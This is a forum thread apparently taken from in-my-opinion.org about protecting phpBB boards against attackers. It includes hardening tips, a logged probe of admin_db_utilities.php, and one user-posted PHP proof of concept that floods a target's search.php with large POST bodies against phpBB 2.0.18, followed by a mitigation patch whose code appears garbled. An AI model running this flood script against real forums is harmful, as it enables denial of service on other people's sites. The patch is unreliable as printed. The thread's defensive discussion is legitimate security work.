In-My-Opinion.org

»How to protect your phpBB forum against hackers«

knn:
Argh, hackers! Freddy is back

This is a description how to make it harder for an attacker to harm your phpBB discussion board or to gain control over it, should a new security issue be found.

Please also see my other phpBB mods at


My tips will help you to protect your phpBB no matter what future bugs or security issues will be found. And no matter what current security issues exist.

Let's see the history of critical (= very serious) security issues:
phpBB critical update to 2.0.11: My tips would have protected you
phpBB critical update to 2.0.13: My tips would have protected you
phpBB critical update to 2.0.15: My tips would have protected you
phpBB critical update to 2.0.16: My tips would have protected you
phpBB critical update to 2.0.17: My tips would have protected you

Unfortunately, the creators of phpBB take the fixing of security issues not serious enough.
• They have no list of all security issues
• If you have modded your forum a lot (= installed/changed/reprogrammed your forum) you have no chance to update it to the newest (= most secure) state. The automatic updates won't work.
• They have no step by step guide how to fix each one of them. For example if your version is 2.0.5 then what do you do to manually update it to fix all security issues fast?
• They have no "security checking programs" which you could run and which would report all open security holes found.
• They are unpolite: When I mentioned that they either a) treat security issues not seriously OR b) modding not seriously then my topic was locked and I was warned.
• They even refused to fix a security bug (they claimed it was no security issue) that later caused the deletion of whole websites (see below: %2527 bug).


But whatever: This is NOT a description how to fix known bugs in phpBB anyway.

Moreover it's NOT ENOUGH to fix the currently known bugs.
• Especially if you use mods (= third party software for your forum) you are at risk, since these mods may contain security bugs themselves.
• Some exploits are so serious that every minute counts. But take the fixing of 2.0.16 for example: It took phpBB approx. 14 days to fix a serious exploit.


Right now, while I write this, phpbb.com itself is under attack. Their site is unavailable except for the text:
At present phpbb.com is offline due to a group of politically motivated hackers.
...
A third party application looks to have been the problem.
...
Please do not ask us...we simply cannot comment at this time without having further information ourselves. Just as soon as we have a clearer picture, which depending on the condition of our server may be impossible to obtain, we will update the community.
...
We are working to recover the server.
...
The persons who attacked the site deleted all web access logs, all system logs and the root user log. Other critical system folders/files were also deleted


The following tips will prevent 99% of cracks, since most of cracks are done by script kiddies  Baby's got a temper who will not waste a lot of time with a single forum.

Some of the tips also apply to other than phpBB software, so you should read them, even if you don't use phpBB.

Wow! Excellent! Your post is so great. I find many, not to say all, of your tips useful. Thumb Up
I have bookmarked your website for further reference. Razz


posted by some guest
  

in-my-opinion.org -> Technology, Computers, Science, Internet -> Software by the admin -> How to protect your phpBB forum against hackers

Tip 5 issue question

I don't see the allowedadminipsforautologin.php, was it deleted or moved? Or do I have to log in to see it?

posted by L
  



L:
Or do I have to log in to see it?

Yes, but I have fixed that issue, now you can download it without logging in


posted by knn
  

Re: Tip 11:Encrypt config.php that contains clear text passw


I've installed your encrypt Config mods as exactly what I read. Sadly, an error occured
Warning: mysql_connect(): Access denied for user: 'ÝÍÃÄ@localhost' (Using password: YES) in /home/lepak/public_html/phpbb/db/mysql4.php on line 48

Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /home/lepak/public_html/phpbb/db/mysql4.php on line 330

Warning: mysql_errno(): supplied argument is not a valid MySQL-Link resource in /home/lepak/public_html/phpbb/db/mysql4.php on line 331
phpBB : Critical Error

Could not connect to the database

I deleted a.php but my forum would not show up and an error message about how mu subsilver config file is missing. FYI, I am using other templates, please advice!


posted by kmoh4346
  

Sorry to dig up but . . .

64.247.38.130 - - [29/Sep/2005:10:40:45 -0400] "GET /admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=0f837d3a435f74d231260615ab7aebaa HTTP/1.1" 404 627 "http://www.digitalhijinx.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


I ran across this in my log files this past week, as noted in your second tip(?) I deleted that admin_db_utilities file since I do remote backups and other mysql tasks thru MYSQLCC. Just thought I'ld drop in and let you know. Very Happy


posted by retorq
  



retorq:
I ran across this in my log files this past week, as noted in your second tip(?) I deleted that admin_db_utilities file

Yes, you should delete this file and use my backup suite to do backups, see IMO → PhpBB mod (freeware): Backup database and files


posted by knn
  


Let's see... I think knn gives very good advices at IMO → How to protect your phpBB forum against hackers unfortunaly I can't loose some of the features... but any one that thinks in terms of security see that they really make sense! For example if they get your admin password... it will not be useful because admin folder it's protect with .htaccess

Something no one said (I didn't see all reply's) is that you can prevent from being discovered by google, altavista...

just put in your root web site: (ex.:
the file "robots.txt" (www.mywebsite.com/robots.txt) assuming that you have your forum at


in robots.txt:

User-agent: *
Disallow: /forum/


And you will prevent google's and others from finding it... and that means less vulnerability from search worms, in search engines! Assuming that you don't need it to be discovered by the search engine... lol.

Sorry for my bad english!


posted by pt_europe
  



pt_europe:
Something no one said (I didn't see all reply's) is that you can prevent from being discovered by google , altavista...

Well, I know another good method to keep you fom being hacked: Don't go online White laugh


posted by knn
  


knn:
pt_europe:
Something no one said (I didn't see all reply's) is that you can prevent from being discovered by google , altavista...

Well, I know another good method to keep you fom being hacked: Don't go online White laugh

well... the "crackers" can always go to your home... loool

Sorry for my bad english!


posted by Johnnyc
  


you mean the white people? What? When? Where? Why?
Johnnyc:
well... the "crackers" can always go to your home... loool



posted by retorq
  

Is there a fix for 2.0.18 Search Expoit/bug?

Found this on the web for 2.0.18

<?
#
# phpBB2018 examples errors
# SecurityReason.Com (Maksymilian Arciemowicz)
# cxib [at] securityreason [dot] com
# securityreason.com… [GPG]
#

if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])){

$POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity"; # 2048b

$POST = "mode=results&search_keywords=";

for($x=1; $x<=$_POST['ILE']; $x++){
$POST .= $POSTx; # f(x)=x * 2048b
}


$sock = fsockopen($_POST['HOST'], 80);
if (!$sock) {return false;}

$out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n";
$out .= "Host: ".$_POST['HOST']."\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\n";
$out .= "Content-Length: ".strlen($POST)."\n\n";
$out .= $POST."\r\n";

fwrite($sock, $out);

$data="";
while(!feof($sock)) {
$data .= fread($sock,4096);
}

fclose($sock);
$data = substr($data, strpos($data,"\r\n\r\n")+4);

echo $data;

} else {

echo "<CENTER>
<A HREF=\"http://securityreason.com\"><IMG SRC=\"http://securityreason.com/gfx/small_log
o.png\"></A><P>
<FORM action=\"\" method=post enctype=\"multipart/form-data\">
HOST: <input TYPE=\"text\" name=\"HOST\"> Like

CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br>
f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br>
<input TYPE=\"submit\" value=\"Send\">
</FORM>";

}
?>


posted by raven007
  



raven007:
Is there a fix for 2.0.18 Search Expoit/bug?

This is a general issue with a lot of scripts, not only with phpBB

You might do this:
Open "common.php"
Find

// Define some basic configuration arrays this also prevents 


BEFORE ADD:

foreach (array('POST''GET''REQUEST') as $gpc)
    {
    $gpcc 'HTTP_'.$gpc.'_VARS';
    if ($GLOBALS[$gpcc])
        {
        foreach ($GLOBALS[$gpcc] as $index => $ppp)
            {
            if (strlen($ppp) > 1024*1024)
                {
                $GLOBALS[$gpcc][$index] = substr($ppp,0,1024*1024-1).' ';
                }
            }
        }
    } 



OR: Use Tip #15 , which protects you from this.


posted by knn
  


sorry but what file is the above mod suppose to be in?

posted by raven
  



raven:
sorry but what file is the above mod suppose to be in?

In the only one where it appears. In "common.php"


posted by knn
  

Shared registration protection?

Ok, well I use the Shared Registration mod (http://phpbbhacks.com/download/3689) which involves a shared_config.php file that is similar to the config.php file, but not similar enough for me the modify the Encrypt Your Config mod to encript my shared_config.php

So what's the best way to protect my shared_config file, and if possible, can someone modify the Encrypt Your Config mod to work with the Shared Registration mod too?

Thank you! Very Happy

posted by Ninja
  



Goto page Previous  
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15  Next

Reply to topic
Goto page Previous  
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15  Next






RegisterRegister
Log inLog in
 		The time now is 6 July 2008, 04:21
php B.B.